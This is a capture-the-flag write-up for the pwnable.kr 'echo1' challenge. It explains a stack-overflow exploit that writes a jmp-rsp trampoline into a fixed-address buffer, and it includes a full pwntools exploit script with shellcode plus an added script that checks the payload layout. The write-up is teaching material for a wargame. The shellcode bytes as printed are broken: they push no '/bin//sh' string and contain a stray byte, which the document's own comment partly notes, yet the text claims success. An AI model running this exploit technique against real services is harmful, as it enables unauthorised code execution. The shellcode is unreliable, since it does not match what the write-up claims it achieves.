Writeup - pwnable.kr
Knowing that we have a stack overflow and control of the saved return address, the plan has two steps. First, write a `jmp rsp` instruction into the name buffer, which lives at a fixed address (0x6020a0 in the exploit below), so the address of the trampoline is known without any leak. Second, use the overflow to overwrite the return address with exactly that buffer address, and place the shellcode immediately after the return address. When the function returns, execution lands on `jmp rsp`; since `ret` has just popped the return address, rsp points at the bytes right after it, i.e. the shellcode. PWNED.
Exploit
```python
from pwn import *
import time

context.log_level = 'debug'

p = remote("pwnable.kr", 9010)
# p = process('./echo1')
# gdb.attach(p, '''
# break *0x0000000000400818
# continue
# ''')

# Shellcode bytes exactly as printed in the original writeup. They decode to:
# xor rax,rax; add rax,0x3b; xor rdi,rdi; push rdi; xor rsi,rsi; xor rdx,rdx; syscall
# (rax = 59 = execve; note that no "/bin//sh" string is pushed in these bytes)
shellcode = b"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\x48\x31\xf6\x48\x31\xd2\x0f\x05"

# Step 1: the name buffer sits at a fixed address (0x6020a0); store "jmp rsp" there.
p.recvuntil(b"hey, what's your name?")
p.sendline(asm("jmp rsp", arch='amd64', os='linux'))

# Step 2: pick menu option 1, which leads to the overflowing read.
p.recvuntil(b">")
p.sendline(b"1")
time.sleep(1)

# Step 3: 40 bytes of padding up to the saved return address, then the
# name buffer address (0x6020a0, little-endian) as the new return address,
# then the shellcode. On `ret` execution lands on "jmp rsp" and rsp points
# at the shellcode that follows the return address.
payload = b"AAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGG"
payload += b"\xa0\x20\x60\x00\x00\x00\x00\x00"   # == p64(0x6020a0)
payload += shellcode
p.sendline(payload)
p.interactive()
```
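The layout reasoning behind the exploit, as an added example that is not part of the original writeup and does not need pwntools: it builds the padding / return address / shellcode payload, checks that the shellcode starts exactly where rsp points after `ret`, finds the return-address offset from a crash value using a cyclic pattern, and scans the payload for bytes that would break line-based delivery. The 40-byte offset, the 0x6020a0 trampoline address and the shellcode bytes are taken from the exploit above; the `cyclic`, `find_offset` and `bad_bytes` helpers are generic helpers written here, not pwntools' own.

```python
# Added example: payload-layout checks for the echo1 jmp-rsp technique.
import struct

JMP_RSP = b"\xff\xe4"          # machine code of asm("jmp rsp") on amd64
TRAMPOLINE_ADDR = 0x6020A0     # fixed-address name buffer holding JMP_RSP (from the exploit)
RET_OFFSET = 40                # bytes from the overflowed buffer to the saved return address
# Shellcode bytes exactly as printed in the writeup (nothing added or changed).
SHELLCODE = (b"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\x48\x31\xf6"
             b"\x48\x31\xd2\x0f\x05")


def build_payload(offset, ret_addr, shellcode):
    """Padding up to the saved rip, the trampoline address, then the shellcode."""
    return b"A" * offset + struct.pack("<Q", ret_addr) + shellcode


def shellcode_offset(offset):
    """Offset at which rsp points once `ret` has popped the 8-byte return address.

    `jmp rsp` therefore lands on whatever was written right after the address,
    which is why the shellcode is appended directly behind it.
    """
    return offset + 8


def cyclic(n):
    """Pattern of 4-letter words 'aaaa', 'baaa', 'caaa', ... of length n.

    Constructed here as a stand-in for pwntools' cyclic(): each aligned 4-byte
    word is unique, so an 8-byte value that ends up in rip can be located.
    """
    out = bytearray()
    i = 0
    while len(out) < n:
        k = i
        for _ in range(4):
            out.append(ord("a") + k % 26)
            k //= 26
        i += 1
    return bytes(out[:n])


def find_offset(crash_rip, pattern_len=256):
    """Return the offset of the saved return address inside a cyclic(pattern_len)
    input, given the value that landed in rip (int or 8 little-endian bytes)."""
    if isinstance(crash_rip, int):
        crash_rip = struct.pack("<Q", crash_rip)
    return cyclic(pattern_len).find(crash_rip)


def bad_bytes(payload, bad=b"\n"):
    """Offsets of bytes that would terminate a line-based read early.

    The exploit delivers the payload with sendline(); a 0x0a inside it would
    end the input before the shellcode if the target reads line by line.
    """
    return [i for i, b in enumerate(payload) if b in bad]


if __name__ == "__main__":
    payload = build_payload(RET_OFFSET, TRAMPOLINE_ADDR, SHELLCODE)
    print("return address at", RET_OFFSET, "shellcode at", shellcode_offset(RET_OFFSET))
    print("bad bytes:", bad_bytes(payload))
    # A crash with rip == the pattern's bytes 40..48 gives back the offset.
    print("offset from crash value:", find_offset(cyclic(256)[40:48]))
```

The check that matters most is `shellcode_offset`: the trampoline only works because `ret` leaves rsp one slot above the overwritten return address, so anything that shifts the stack between `ret` and `jmp rsp` (nothing does here, since the jump is the very first instruction executed) would move the landing point.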